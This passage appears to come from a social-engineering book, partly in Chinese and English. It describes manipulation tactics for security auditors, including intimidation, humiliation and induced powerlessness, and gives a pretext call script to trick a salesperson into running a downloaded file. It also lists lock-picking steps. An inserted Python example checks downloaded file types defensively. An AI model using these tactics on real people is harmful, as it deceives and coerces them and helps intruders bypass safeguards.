米其林轮胎就是一个运用条件反射的例子(见图6-11)。多年来,这家公司一直在其广告中使用婴儿。为什么?“因为轮胎承载着太多东西。”但这些广告的意义远不止于此。你看到婴儿,会微笑,会感到快乐。这种情绪会引发积极的反应,而这种反应会使你同意接下来要说的话。当你看到婴儿时,你会微笑;当你看到婴儿很多次时,你就会习惯性地想到米其林轮胎时产生的温暖、快乐的感觉。

One example of how conditioning is used is Michelin Tires (see Figure 6-11). For years this company has used babies in its ads. Why? “Because so much is riding on your tires.” But these ads have more to them. You see a baby, you smile, and you are happy. That emotion triggers a positive response, and that response conditions you to be agreeable to what is told to you next. When you see the baby you smile; when you see it enough you are conditioned to think of warm, happy feelings when you see Michelin tires.

 

图 6-11:婴儿不是很可爱吗?

Figure 6-11: Aren’t babies cute?

 
f0611.tif
 

看到轮胎旁边的婴儿会让你将积极快乐的情绪与该品牌联系起来。这是经典操纵的一个例子。

Seeing the baby next to the tire makes you equate positive happy feelings with that brand. This is an example of classic manipulation.

 

另一个百威广告(见图6-12)可能让很多人感到疑惑——还记得那些打嗝出“Bud”、“weis”和“er”的青蛙吗?青蛙和啤酒有什么关系?同样的,想想最近的克莱兹代尔马和他的动物朋友团伙。这些广告很吸引人,第一次看到甚至很有趣,但并没有真正解释你为什么要买他们的啤酒。

Another advertisement (see Figure 6-12) that might have had many people wondering from Budweiser—remember those popular frogs belching out “Bud” “weis” and “er”? What do frogs have to do with beer? Along those same lines, think of the more recent Clydesdale horse and his gang of animal friends. These ads are catchy, even funny the first time, but not really explaining why you want to buy their beer.

 

图 6-12:卖啤酒的青蛙。

Figure 6-12: Frogs selling lager.

 
f0612.tif
 

这种操纵和条件反射的形式非常微妙。你对那个广告大笑,然后你开车来到当地的啤酒经销商处,看到青蛙或马的纸板剪影,不禁会心一笑,这会产生一种积极的感觉,让你愿意购买该产品。

This form of manipulation, conditioning, is subtle. You laugh at that commercial, and then later on you pull into your local beer distributor, see a cardboard cutout of the frogs or horse, and smile to yourself, which creates that positive feeling that makes you feel agreeable to buying the product.

 

这些条件反射策略经常用于销售和营销公司,目的是操纵消费者购买他们的产品而不是竞争对手的产品。社交工程师实际上并不是在销售产品,但他们确实希望他们的目标“购买”他们销售的产品、他们摆出的借口以及他们希望目标采取的行动。但为什么要使用操纵?利用这种强大的控制形式的动机是什么?下一节将介绍这个主题。

These conditioning tactics are used often in the world of sales and marketing firms with the goal of manipulating the consumer to buy their products over the competition. Social engineers aren’t really selling a product, but they do want their targets to “buy” the lines they are selling, the pretext they are putting out there, and the actions they want the target to take. But why use manipulation? What are the incentives to utilizing this powerful form of control? The next section covers that very topic.

 

Manipulation Incentives

What are the incentives to manipulate someone? This question gets to the root of the methods, thinking, and tactics used in any manipulation. Not all manipulation is negative; whether it is depends on the incentive behind it, and each incentive can itself be positive or negative.

What is an incentive? An incentive is anything that motivates you to take an action. It can be money, love, success, or anything else, even negative emotions like hatred, jealousy, and envy.

The main reasons people choose to manipulate others can be broken down into three categories: financial, social, and ideological incentives. The following sections look at each of these incentives and how they apply to manipulation.

Financial Incentives

Financial incentives tend to be the most common, as in the cases mentioned earlier related to increasing sales. Many scams have a financial incentive behind their tactics.

How many people play the lottery every day hoping for that winning ticket? They may spend hundreds of dollars over time, yet a $20 payoff makes them happy and keeps them coming back for more.

A non-malicious example of a financial incentive is coupons. If you buy this particular product at this particular store, you get X dollars or cents off. If you are a thrifty shopper or want to try that product, you will go to that store.

Many commercials that promote furthering your education, career, or skill set use financial incentives by painting a picture of your income increasing after their course or program.

The malicious attacker's incentive for using manipulation is his own financial gain, and his motivation and technique will reflect that. For example, if the malicious social engineer's goal is to get the target to part with some hard-earned money, the social engineer will use a pretext that is "allowed" to ask for money. A charity organization is a suitable pretext in this scenario, because asking for donations or financial information is not out of the ordinary for one.

Ideological Incentives

Ideological incentives are the most difficult to describe. Each person's ideals are different, and those ideals shape the incentive. If your dream in life is to run a restaurant, then that is your passion. You will work longer hours and put in more effort than any of your employees. You will also work for less money, because it is your dream and your motivation; for everyone else it is just a job.

Dreams and beliefs can be so ingrained in a person that separating them from the person is almost impossible. When you read the phrase "I have a dream," did you think of Martin Luther King? Some people's dreams and goals are who they are, not merely what they think about.

People tend to be drawn to those with similar dreams and goals, which is why the phrase "Birds of a feather flock together" applies so well to this discussion. But it is also why so many people can be manipulated.

Look at Christian televangelists, for example. People who have faith and a desire to believe in God flock together. Like-minded people can strengthen each other's faith and desire to do the right thing, but a televangelist can use that ideology to convince people that God's desire is for that particular church to prosper, lining the televangelist's pockets with cash along the way.

The televangelist gives a few motivating sermons and sheds some tears, and suddenly people are sending in checks. These televangelists use the tools of both financial and social ideals (see the following section, "Social Incentives") to convert their listeners to their ideals so that those people part with their hard-earned cash. What is interesting is that if you ask a follower how he feels about the preacher being far richer than he is, he believes it is God's will. His set of ideals has been changed, or manipulated.

Ideological incentives can also be used for good, by teaching people morals, and even fear used as the incentive can have a great effect on people. Ideological incentives are often taught to children through stories and fables with a meaning behind them. The Brothers Grimm are an excellent example of this type of incentive. Their stories often end with the bad characters suffering physical harm or even death, while the good characters persevere through every form of hardship and receive a massive reward at the end; the lesson builds on the fear that being bad leads to death or some terrible punishment.

Ideological incentives are used in marketing, too, by placing ads where "like-minded" ideals often "meet." For example, diaper companies market in family magazines, animal shelters market at zoos, athletic gear companies market at sporting events, and so on. This type of incentive gives a greater chance that the goods or services being advertised will be bought by those who share the same ideals.

Ideological incentives are used to bring one's ideals into alignment with those of like-minded people. Often, the manipulation tactics start once people are already sympathetic to a cause. Again, not all manipulation is bad, but it has to be used in the proper way.

Social Incentives

Social incentives are probably the most widely used and the most complex set of incentives out there, especially when it comes to social engineering.

Humans are social by nature; it is what we do in normal daily life. Social incentives also encompass all the other types of incentives. The right relationship can enhance your financial position and can also adjust, align, or augment your ideals. It could be argued that social incentives are stronger than the other two types.

The power that peer pressure holds over many people is easy to see. For young and old alike, the draw of conformity is powerful. Many times, what is considered acceptable is directly linked to a social incentive. One's outlook on life and on oneself can be greatly affected by one's social surroundings. In essence, peer pressure can exist even in the absence of direct peers.

Am I good looking? Well, that depends. If I am in the United States, where a supermodel is a size zero and the guys have muscles in places I didn't know muscles existed, probably not. If I am in ancient Rome, where being larger may have meant I was rich and powerful, then I am. Your whole inner self is framed by your social view of the world.

In 1975, the U.S. Air Force ran a study entitled "Identification and Analysis of Social Incentives in Air Force Technical Training" to examine the power of social incentives in creating leaders during its training drills. It ran four different scenarios with a group and analyzed what effects they had on the students.

The end result was that a certain social incentive, usually involving praise or positive reinforcement from peers or authority figures, created a strong bond between the students and instructors:

The major conclusion of this entire research effort is that the management of social incentives is a particularly difficult art. While social incentives can be identified and scaled with considerable ease, manipulation and management of the same incentives requires considerably greater effort. The scaling data show high attractiveness value for various social incentives. The results of the field experiment show the positive influence of the acquaintanceship and psychological contract exercise on attitudes toward fellow trainees. Both of these findings underline the importance of social factors.

In other words, increasing or decreasing the attractiveness of a social incentive is not too difficult once you know what motivates a person. This phenomenon is particularly evident in groups of teenagers. When they find out what bothers someone, it is often used as a weapon to force compliance. The larger the group applying the pressure, the greater the chance the target will comply.

This is a powerful statement. I wonder how that research would have gone if the researchers had been able to use the plethora of social media sites that exist today. Peer pressure is a strong influence, and everyone wants to fit in and be part of the crowd.

Social incentives work. In 2007 a group of researchers (Oriana Bandiera, Iwan Barankay, and Imran Rasul) wrote a research paper entitled "Social Incentives: The Causes and Consequences of Social Networks in the Workplace" (www.social-engineer.org/wiki/archives/Manipulation/Manipulation-Social-Incentivespdf.pdf).

The report is an interesting study along the lines of the Air Force study, but set in 2007. Basically, the researchers analyzed how those who have "friends" at work handle their jobs when they work in groups with those friends. Their conclusion:

Our findings indicate there are social incentives—the presence of friends affects worker productivity, despite there being no externalities of worker effort onto their co-workers due to the production technology or compensation scheme in place. Due to social incentives, workers conform to a common norm when working together. The level of the norm is such that the presence of friends increases the productivity of workers who are less able than their friends and decreases the productivity of workers who are more able than their friends.

Social incentives are a quantitatively important determinant of a worker's performance. As workers are paid piece rates based on individual productivity, the strength of social incentives is such that (i) workers who are more able than their friends are willing to forgo 10% of their earnings to conform to the norm; (ii) workers who have at least one friend who is more able than themselves are willing to increase productivity by 10% to meet the norm. Overall, the distribution of worker ability is such that the latter effect dominates so the net effect of social incentives on firm performance is positive.

The presence of friends meant that a person would actually work harder or less hard, depending on their normal work level. Peer pressure without any actual pressure can affect people's work; the pressure is perceived through what is standard. Why? Maybe a person who could work faster or better didn't want to appear to be a know-it-all or brown-noser, as such people are called. Maybe someone who is normally more of a slacker didn't want to appear lazy, so he pushed up the pace a little. In either case, their work ethic was affected by having friends present.

A good point for management is to always put the hardest workers and natural leaders in charge of the group. But there is much more to learn from this research.

This effect is how social engineers use "tailgating." Being in a large crowd of people coming back from a break or lunch, and looking like one of the employees, minimizes the chance that the security guard will stop you as you walk through the front doors.

It is also how whole groups of people can be manipulated into thinking a certain action or attitude is acceptable. You can see this in the entertainment industry, where each year the standard of what is acceptable or moral seems to get lower, yet the drop in standards is sold as "freedom."

These three incentives are not the only types that are used. They branch off into other aspects beyond the scope of this book, but the question remains of how you can use them as a social engineer.

Manipulation in Social Engineering

Manipulation is less about making others think like you do and making them feel comfortable, and more about coercing them into doing what you want.

Coercion is not a friendly word. It means "to force to act or think in a certain manner" or "to dominate, restrain, or control by force."

Manipulation and coercion use psychological force to alter the ideology, beliefs, attitudes, and behaviors of the target. The key to using them is to make the steps so small that they are almost invisible. The social engineer doesn't want to alert the target that he is being manipulated. Some of the following methods may be very controversial and downright horrible, but they are used every day by scammers, identity thieves, and the like. One of the goals of manipulation can be to create anxiety, stress, and undue social pressure. When a target feels that way, he is more likely to take the action the social engineer is manipulating him to take.

With that in mind, you can see why manipulation is often thought of in a negative light, but it is used in social engineering and therefore must be discussed.

Increasing a Target's Suggestibility

Increasing a target's suggestibility can involve using the neurolinguistic programming (NLP) skills discussed in Chapter 5 or other visual cues. Earlier you read about conditioning people with pen clicks or other noises or gestures that can elicit an emotion even when no words are spoken.

I once saw this in action when I was with a person who was manipulating a target. He used a pen click to mark a positive thought. He would say something positive, then smile and click his pen. I literally saw the target begin to smile after hearing the pen click about four or five times. He then brought up a very depressing subject and clicked his pen, and the target smiled and was instantly embarrassed. That embarrassment was the open door he needed to manipulate the target into doing what he wanted.

Creating a situation in which the other person feels susceptible to suggestion can be done through repetition of ideas or other means that soften the target to the ideas you are trying to present.

A social engineer can make sure the whole setup is geared toward this manipulation: the phrases used, the word pictures painted, the clothing colors chosen. All of it can make the target more susceptible.

William Sargant, a controversial psychiatrist and author of the book Battle for the Mind, discusses the methods by which people are manipulated. According to Sargant, various types of beliefs can be implanted in people after the target has been disturbed by fear, anger, or excitement. These feelings cause heightened suggestibility and impaired judgment.

A social engineer can use this to his advantage by offering the target a suggestion that causes fear or excitement and then offering a solution that becomes the real suggestion.

For example, in the hit BBC TV show The Real Hustle, the cast ran a scam that showed how this works: they set up a booth in a mall that allowed people to buy raffle tickets. People would buy a ticket for a chance to win one of three prizes worth much more than the ticket they had just bought.

One woman bought a ticket and, of course, won the biggest prize. Her excitement was extreme because she had never won anything like it before. At this point Paul Wilson gave the suggestion that manipulated her: at the height of her excitement, he told her she had to call a phone number and provide her bank information to claim her prize.

She did it without a second thought. The suggestion made sense, especially in the light of her excitement.

Knowing the target and his likes, dislikes, kids' names, favorite teams, and favorite foods, and then using this to create an emotional environment, makes creating a susceptible atmosphere so much easier.

Controlling the Target's Environment

Controlling the target's environment is often used in online social engineering, scams, and identity theft.

Becoming part of the same social networks and groups gives the attacker "face time" in which to manipulate targets into acting or thinking the way the attacker wants. Being able to use a target's social networks to find out what triggers he has is also a powerful tool.

I used this method once when searching for an illegal scammer for a client who wanted the scammer's contact details. I was able to get an account on a forum he used to post his "achievements." By getting into his environment and then befriending him, I was able to gain his trust, use his social networks to know what he was doing, and eventually get his contact information.

Any method of controlling the target's environment can serve this manipulation technique. Controlling the environment can be as simple as approaching when you know you have the least chance of interruption, or allowing a target to see, or not see, something that will cause a reaction.

Of course, unless you plan on bringing your target to a dark closet, you can't really control his whole environment, so controlling as much of it as you can takes planning and research. After you locate your target's social circles, whether online or in the real world, you need to spend time planning how you will get in so you can control that environment. Once inside, which elements do you want to control? A good social engineer will not come in running for the "kill shot" but will take time to build a relationship and gather information before the final blow is administered.

Environment control is often used in police or wartime interrogations. The room where the questioning takes place is given a certain atmosphere to make the target feel at ease, nervous, scared, anxious, or whatever other emotion the attacker (or lead officer) wants the target to feel.

Forcing the Target to Reevaluate

Undermining a target's beliefs, awareness, or emotional control of a situation can have a very unsettling effect on him or her. This tactic is very negative because it is used to make a target doubt what he or she has been taught to be true.

Cults use this tactic to prey upon those looking for guidance through life. Many times, people who feel lost or confused are convinced that their whole belief system needs to be reevaluated. Once the cult has control, it can be so convincing that the victim becomes thoroughly convinced that family and friends do not know what is best.

On a personal social engineering level, you can make a person reevaluate the beliefs he has been taught about what is safe and what is not, or what is corporate policy and what is not.

Every day social engineers use similar tactics, presenting one well-thought-out question that causes the target to reevaluate his stand on a topic and falter.

For example, in this economy salespeople are hungry to make sales, and you could call the sales department of a company that happens to have a strict policy against downloading PDFs from the web without proper scans and precautions. Yet you can still place this call:

"Hi, I am with ABC Company and I want to place an order for your product that could be more than 10,000 pieces. My employer wants me to get three quotes to see whether we can do better. I have uploaded the quote package to our website; can I give you the URL? I am going to a meeting in two hours. Could you look over the package and get me a preliminary quote before then?"

Do you think this tactic would work? Most likely the salesperson would download and execute that file with little to no thought. You have caused him to reevaluate the policy he has been taught.

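The policy the salesperson is talked out of is a technical control, and one way to make it hold no matter how urgent the caller sounds is to check what a downloaded "quote package" actually is before anything opens it. The following is an added example and not code from the book: it classifies a file by its leading bytes rather than by its name, so a Windows executable renamed to .pdf, a double extension such as quote_package.pdf.exe, or a ZIP/Office container that could carry macros is blocked while a genuine PDF passes. The sample files are constructed inline, and the signature list is an assumption of the example rather than a complete file-type database.

```python
"""Check what a downloaded "quote package" really is before anything opens it.

Added example for this section, not code from the book. The sample files are
constructed in memory and written to a temporary directory so the check runs
offline. The signature list is an assumption of the example, not a complete
file-type database.
"""
import tempfile
from pathlib import Path

# Leading bytes ("magic numbers") for the formats the check distinguishes.
MAGIC = {
    b"%PDF-": "pdf",
    b"MZ": "windows-executable",                          # PE file, e.g. an .exe renamed .pdf
    b"\x7fELF": "elf-executable",
    b"PK\x03\x04": "zip-container",                       # ZIP, or .docx/.xlsx/.jar inside
    b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1": "ole-document",  # legacy .doc/.xls, macro-capable
}
SCRIPT_PREFIXES = (b"#!", b"<script", b"@echo off", b"powershell")
DANGEROUS_EXTENSIONS = {".exe", ".scr", ".js", ".vbs", ".bat", ".cmd", ".ps1", ".jar", ".hta"}
EXECUTABLE_KINDS = {"windows-executable", "elf-executable", "script"}
CONTAINER_KINDS = {"zip-container", "ole-document"}


def sniff_type(head: bytes) -> str:
    """Classify content by its leading bytes; the file name is never consulted."""
    for magic, kind in MAGIC.items():
        if head.startswith(magic):
            return kind
    lowered = head[:64].lstrip().lower()
    if any(lowered.startswith(p) for p in SCRIPT_PREFIXES):
        return "script"
    return "unknown"


def check_download(path: Path) -> dict:
    """Decide whether a file the caller described as a PDF may be opened.

    The verdict depends only on the file, not on how urgent the request sounded.
    """
    name = path.name.lower()
    suffixes = Path(name).suffixes            # "quote.pdf.exe" -> [".pdf", ".exe"]
    with path.open("rb") as f:
        head = f.read(64)
    kind = sniff_type(head)

    reasons = []
    if suffixes and suffixes[-1] in DANGEROUS_EXTENSIONS:
        reasons.append(f"executable extension {suffixes[-1]}")
    if len(suffixes) > 1 and ".pdf" in suffixes[:-1]:
        reasons.append("double extension hides the real type")
    if name.endswith(".pdf") and kind != "pdf":
        reasons.append(f"named .pdf but content is {kind}")
    if kind in EXECUTABLE_KINDS:
        reasons.append("content is executable code")
    if kind in CONTAINER_KINDS:
        reasons.append(f"{kind} may carry macros; open only in a sandbox")
    return {"file": path.name, "content_type": kind, "allowed": not reasons, "reasons": reasons}


def demo() -> list:
    """Write four constructed sample files and check each one."""
    samples = [
        ("quote_package.pdf", b"%PDF-1.7\n1 0 obj << /Type /Catalog >> endobj\n"),  # genuine PDF
        ("quote_package_v2.pdf", b"MZ\x90\x00\x03\x00\x00\x00PE\x00\x00"),         # PE renamed .pdf
        ("quote_package.pdf.exe", b"MZ\x90\x00\x03\x00\x00\x00PE\x00\x00"),        # double extension
        ("quote_package.zip", b"PK\x03\x04\x14\x00\x00\x00\x08\x00"),               # container
    ]
    results = []
    with tempfile.TemporaryDirectory() as tmp:
        for name, content in samples:
            p = Path(tmp) / name
            p.write_bytes(content)
            results.append(check_download(p))
    return results


if __name__ == "__main__":
    for r in demo():
        status = "ALLOW" if r["allowed"] else "BLOCK"
        print(f"{status:5} {r['file']:24} {r['content_type']:20} {'; '.join(r['reasons'])}")
```

The point of the check is that it is indifferent to the pretext: the caller's deadline, order size, and friendliness never reach it, so the decision the salesperson was pressured into making by phone is taken out of his hands and returned to the policy.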
Making the Target Feel Powerless

Making the target feel vulnerable or powerless is another very dark, but effective, tactic. It is often used in social engineering when the pretext is an angry executive or someone who should have power over the target. Angered by the target's lack of response or inability to give quick answers, the attacker berates or threatens the target, causing him to doubt his position and feel a loss of power.

Another, more subtle, way this is used is to undermine the belief system using social incentives. In one audit I was stopped by a custodian while doing scans of the internal network. When she did the right thing by stopping me, I reacted with something like, "Did you know that each year this company deals with a constant battle against network breaches? I am trying to secure you, and you are trying to stop me from doing my job!"

My overpowering demeanor caused her to feel powerless, and she backed down.

Giving a target the impression that he has no time to think, or that there is serious urgency, can also make him feel powerless. He cannot take the time to think about how to handle a problem and therefore makes a decision in a way he knows he shouldn't.

This tactic was used after the recent earthquakes in Haiti. A website was launched that claimed to have information on loved ones who might have been lost. Because the claim was that no one but the group who set up the site could provide information on those loved ones, the group could demand that certain criteria be met before it released the information. Many people, feeling hopeless and powerless, entered too much information and clicked things they knew they shouldn't, and in the end were harmed by it. The BBC ran a story about this that lists some tips for staying protected: http://news.bbc.co.uk/2/hi/business/8469885.stm.

Dishing Out Nonphysical Punishment

Closely linked to making the target feel powerless is making him feel guilt, humiliation, anxiety, or a loss of privilege. These feelings can be so strong that a target might do almost anything to "regain favor."

Guilt over not giving what was expected can cause humiliation and doubt, which can make the target react the way the attacker wants.

I don't suggest using humiliation in most social engineering settings, but I have seen it used on a target in a team effort to open a door, and used on another social engineering team member to soften the target's demeanor and make him more pliable to suggestion.

The first attacker approached the target in a public setting, trying to get information; he was playing the role of someone important.

In the middle of the conversation an underling, who happened to be female (and on the team), came up and asked a question that angered the first attacker. He reacted by saying, "You have to be the dumbest person I have ever met," and walked away in a fit of anger. The female attacker looked dejected and hurt and was quickly comforted by the target, who fed into her act. The target's empathy allowed him to be manipulated into giving out far more information than he intended.

恐吓目标

Intimidating a Target

 

威胁并不是社会工程学中传统意义上的策略。你不会把目标绑起来然后对他施以“杰克鲍尔”式的攻击,但你可以以微妙的方式使用威胁。

Intimidation is not a tactic that you might think of using in a traditional sense in social engineering. You are not going to tie up your target and go all “Jack Bauer” on him, but you can use intimidation in subtle ways.

 

暗示不遵守规定会导致被解雇或其他不良后果,可以威胁目标做出某种反应。政府经常使用这种策略来操纵社会,让社会相信经济体系正在崩溃。这样他们就可以控制被统治者的情绪。

Suggesting that failure to comply can lead to being laid off or other adverse consequences can intimidate the target to react a certain way. Governments often use this tactic to manipulate society to believe that the economic system is collapsing. This way they can control the emotions of those they govern.

 

你可以在社会工程审计中使用它,即使外表看起来很吓人。忙碌、不安和肩负重任的样子会让很多人感到害怕。说话时带着非常权威的表情也会让人感到害怕。

You can use it in a social engineering audit even by having an intimidating appearance. Looking busy, upset, and on a mission can intimidate many. Talking with very authoritative expressions can also intimidate people.

 

在商业中,通过挂号信或快递寄送物品会带有一定程度的恐吓意味。让收件人签收一份内容不明的包裹可能会让一些人感到害怕。这种操纵策略的目的是让目标感到不安和焦虑,这可能会导致他做出事后会后悔的反应,但那时已经太晚了。

In business, sending things by certified mail or courier connotes a level of intimidation. Making the person sign for a package whose contents are unknown can make some people intimidated. The goal with this manipulation tactic is to make the target feel uneasy and anxious, which can cause him to react in a way he will later regret, but by then it is too late.

 

These darker manipulation techniques are used successfully by social engineers and professional auditors. Manipulating a person to feel completely helpless causes him or her to feel that giving in to the attacker makes sense.

 

That really is where manipulation differs in a social engineering practice from other forms of influence. With negative manipulation the social engineer leaves and doesn’t care how the target feels later on. Even if a target realizes he has been hacked, it doesn’t matter because the damage is done and the company or person is already infiltrated.

 

Other aspects of social engineering manipulation are just as powerful but not so dark.

 

Using Positive Manipulation

 

Positive manipulation has the same goals in mind as negative manipulation—in the end the target is in alignment with your thoughts and desires. The differences are in how you get there. But in positive manipulation, the target doesn’t need therapy when you are done.

 

Over my years of research, I have compiled some tips about how parents interact with their children to get them to comply with the parents’ wishes. A few of its points on positive manipulation are useful for social engineers. The following sections cover some of these positive techniques.

 

Disconnect Your Emotion from Their Behavior

 

Keeping your emotions separate from your target’s behavior is important. As soon as you let your emotions get involved the target is manipulating you. You can feel emotion, of course, but be in control of what you feel and how you display what you are feeling.

 

You do not want to be the one out of control. You also want to control the negative emotions as much as possible so you can remain in control at all times.

 

Disconnecting your emotions can also put people at ease. This doesn’t mean being devoid of emotion; that is not comforting to people. But if someone is really upset, showing the proper level of concern is good, but if your display of emotion is too much you can offset the target and ruin the gig.

 

Keep your emotions in alignment with the pretext you are trying to achieve. If you do not allow your emotions to get involved you can remain in control at all times. A good social engineer is able to do this despite the actions or attitudes displayed by the target. If the target is upset, mad, belligerent, rude, or if any other negative emotion is displayed, a good social engineer remains calm, cool, and collected.

 

Look for the Positive to Mention

 

Whenever you can, find something to make a joke about or compliment, but without being creepy. You don’t want to walk up to the security guard and say, “So two nuns walk into a bar….” This method probably won’t go over too well. At the same time you can’t walk into the front office and say to the girl behind the counter, “Wow, you’re pretty.”

 

Finding something positive to mention puts everyone at ease, but it must be balanced, controlled, and in good taste. Using the example of approaching a security guard, after introducing yourself, complimenting the picture of her children by saying something like, “Wow, she is really cute; how old, four or five? I have a little girl at home, too,” can go a long way toward opening the door.

 

Assume, Assume, Assume

 

You have probably heard what they say about people who assume, but in this case, assume it all. Assume that the target will act the way you want, assume he will answer the way you want, and assume he will grant you all your requests.

 

Assume with the questions you ask and the statements you make.

 

“When I come back from the server room…”

 

This statement assumes you belong there and you are already granted access. In the security guard situation mentioned earlier, after the compliment maybe offer a follow-up: “When I get back from checking the servers, I will show you a picture of my daughter.”

 

Assuming that what you want will occur is a strong point, too, because it affects your mental outlook. You must have the mental outlook that you are getting what you came for; that belief system will create a new body language and facial expressions that will feed your pretext.

 

If you go in expecting failure you will fail or at best it will affect your body language and facial expressions. If you have the mental outlook that this deal is done, the same will occur. A word of caution, though—don’t take this step so far you become arrogant.

 

For example, going in thinking, “Of course I have this in the bag because I am amazing and the best,” can affect the way you come off and turn off the target quickly.

 

Try Different Opening Lines

 

Starting a conversation with the standard why/what/when is common but try a different approach and see what happens. The research group that runs a popular dating site (www.okcupid.com) compiled data that shows the value of starting out with non-traditional openers.

 

Remember the discussion about compliments? Well, the OkCupid guys found that starting off with too “big” of a compliment had the reverse effect than what one would think. Words like sexy, beautiful, and hot had terrible effects on people, whereas words like cool, awesome, and fascinating had a better effect.

 

In usual greetings these guys found that saying things like “hi,” “hey,” and “hello” left the target feeling blah and unmotivated, whereas “How’s it going?,” “What’s up?,” “howdy,” and “hola” were strong openers to use.

 

Of course, these stats are about dating, but the point to be learned is that people react better to nontraditional greetings.

 

Similarly, in a social engineering situation, vary your approach and you may notice an increase in the way the target reacts to the message.

 

Use Past Tense

 

When you want to address anything negative that you do not want the target to repeat, put it in past tense. This technique puts the negative attitudes and actions in the past in his mind, presenting him with the new and improved “clean slate” on which to do good things for you. For example:

 

“When you said I couldn’t get in to meet with Mr. Smith…”

 

as opposed to: “When you say I can’t get in to meet Mr. Smith….”

 

Only verb tense changed, but the effect is very important. It gives the impression that the negative statement is so far in the past, let’s move on to something new and improved. It also makes the target feel that you feel it is in the past.

 

Seek and Destroy

 

Identify, map, and plan how you will handle any disruptive or negative attitudes and actions. Imagine if your pretext is to be a tech support guy who will gain access to the server room. In your previous calls you knew that every day at 10 am a large group goes out for a smoke break. You decide this is a good time as people are shuffling in and out. You go all prepared, but as you enter the building the receptionist has just received some bad news and is an emotional mess. You should have a plan for handling this disruption.

 

If you wait to think about how you will handle potential conversation stoppers, or disruptive influences, until the first time you hear them you will most likely fail to handle them. That presents an interesting thought then. You have to sit back and think like the target: what objections would he raise? When a person he does not know calls or approaches him, what might he say? What objections might he raise? What attitudes would he portray? Thinking through these things can help you to make a game plan for these potential problems.

 

Write down your thoughts and the target’s potential objections and then role play. Have your spouse or friend play the mean gatekeeper or security guard. Of course, he or she cannot imitate elements such as facial expressions and so on. But you can give him or her a small list of conversation stoppers to choose from to test your comeback.

 

Practice until you feel comfortable, but not scripted. Remember the comeback is not to be structured so stiffly that you cannot alter it at all.

 

Positive manipulation can have a very strong effect on the target. Not only does it not leave him feeling violated but if done properly he can feel accomplished and as if he did something good for the day.

 

Summary

 

Manipulation is a key component to social engineering as well as influence. This chapter covered areas of human behavior that spanned decades of research from some of the smartest minds on earth.

 

Common reactions to the thought of manipulating others might be:

  • “I don’t want to manipulate people.”
  • “It feels wrong to be learning this.”

These comments represent the way most people think when they hear the word manipulation. Hopefully, you’re now convinced that manipulation isn’t always a dark art and can be used for good.

 

The world of influence has been dissected, researched, and analyzed by some of today’s brightest psychologists and researchers. This research served as the basis of my own research to develop the information in this chapter. The section on framing, for instance, can truly change the way you interact with people, and the concept of reciprocation can shape your thinking as a social engineer and how you utilize influence. Influence is such an amazing topic, though, that volumes of books are devoted to that topic alone.

 

Understanding what triggers a person to motivate him to want to do a certain action and then having that action seem good to the target—that is the power of influence.

 

This chapter illuminated the science and psychology of what makes people tick, and clarified how influence is used by social engineers.

 

Remember, influence and the art of persuasion are the processes of getting someone else to want to do, react, think, or believe in the way you want them to.

 

The power in this statement transcends social engineering and manipulation. It is the key to altering any frame, the key to unlocking any door of manipulation, and the pathway to becoming a master at influence.

 

Social engineers also use many physical tools, some of which might look like they were taken out of a page of a James Bond movie, and they are discussed in the next chapter.

 

Chapter 7

 

The Tools of the Social Engineer

 

Man is a tool-using animal. Without tools he is nothing, with tools he is all.

 

—Thomas Carlyle

 

When it comes to social engineering having a decent toolset can make or break the ability of the social engineer to be successful. In addition, it is not so much having the tools but also possessing the knowledge on how to use them that can bridge the gap between success and failure.

 

This chapter discusses the differences between physical tools, phone tools, and software-based tools. Note that simply possessing the most expensive or best tools will not make you a social engineer. Instead, tools can enhance your security practice the way that the right blend of spices can augment a meal—too much or too little can make the meal bland or overpowering. You do not want to look like Batman wearing a utility belt going into a social engineering gig, nor do you want to be at the target’s front door without the proper toolset to gain access.

 

The social engineer’s tools category has the potential to be huge, but this book isn’t trying to become a manual on how to pick locks or spoof a phone number. Instead it is an attempt to give you enough information to decide what tools would augment your practice.

 

The first section of this chapter, “Physical Tools,” focuses on things like lock picks, shims, and cameras. Some new and exciting tools are on the market that will make the average social engineer feel like James Bond. This chapter covers some of these tools and how to use them, and even shows some pictures of the tools. In addition, this chapter provides some information on using phone spoofing in a social engineering attack, continues with a discussion of some of the best software-based information-gathering tools on the market, then ends with a discussion about password profiling tools.

 

Physical Tools

 

Physical security is comprised of the measures that companies or people take to remain secure that do not involve a computer. It often involves locks, motion cameras, window sensors, and the like. Understanding physical security and how it works is part of being a good social engineer. You don’t have to be an engineer of these devices but having a clear understanding of the security mechanisms a target has in place can help you overcome obstacles that might stand in the way of a successful social engineering audit.

 

Lock Picks

 

Before getting into the topic of picking locks you have to know a bit about how a lock works.

 

Figure 7-1 shows a very rough image of a simple lock.

 

Figure 7-1: A simple view of a lock.


Basically the way a lock works is that it has tumblers that are manipulated by the key. The key pushes up the tumblers and upper pins, and when they line up it allows the key to turn and unlock the door, server room, cabinet, and so on.

 

A lock pick simulates the key in moving all the pins into the correct position one by one, allowing the lock to turn freely and open the door. You need two main tools to pick a lock: picks and a tension wrench.

 

Picks are long pieces of metal that curve at the end, similar to a dentist’s tool. They reach inside the lock and move the pins up and down until they are in the right position.

 

Tension wrenches are small flat metal devices that allow you to put pressure on the lock while using the pick.

 

Rakes look like picks but are used in a “raking” motion over the lock in an attempt to catch all the pins. It is the quick motion of moving the rake in and out of the lock that many lock pickers find attractive because it usually makes quick work of most locks.

 

To pick a lock, follow these steps:

 

1. Insert the tension wrench into the keyhole and turn it in the same direction you would turn the key. The real skill here is knowing how much tension to add—use too much or too little, and the pins won’t fall into place, thus allowing the lock to turn. Providing just the right amount of tension creates a small ledge that offsets the plug enough to catch the pin shafts.

2. Insert the pick and use it to lift the pins one by one until you feel them lock in place. You can hear a slight click when an upper pin falls into position. When you get all the pins into position the plug will rotate freely, and you will have picked the lock.

 

The preceding is the $2 tour of lock picking and barely scratches its surface. If you want some great information on lock picking visit any of the following websites:

 
 
 

These are just a few of the many sites devoted to lock-picking education. As a social engineer, spending time practicing picking locks is wise. Carrying a small lock-pick set with you can be a lifesaver when you’re in front of a server cabinet, desk drawer, or other locked obstacle containing juicy information.

 

Lock pick sets can be as small as those shown in Figure 7-2, which are the size of a normal business card.

 

Figure 7-2: This business card–sized lock-pick set fits easily into a wallet or purse.


They can also be bulkier, as shown in Figures 7-3 and 7-4.

 

Figure 7-3: This set is about the size of a pocketknife.


Figure 7-4: This lock-pick set is bulkier but contains everything you would need.


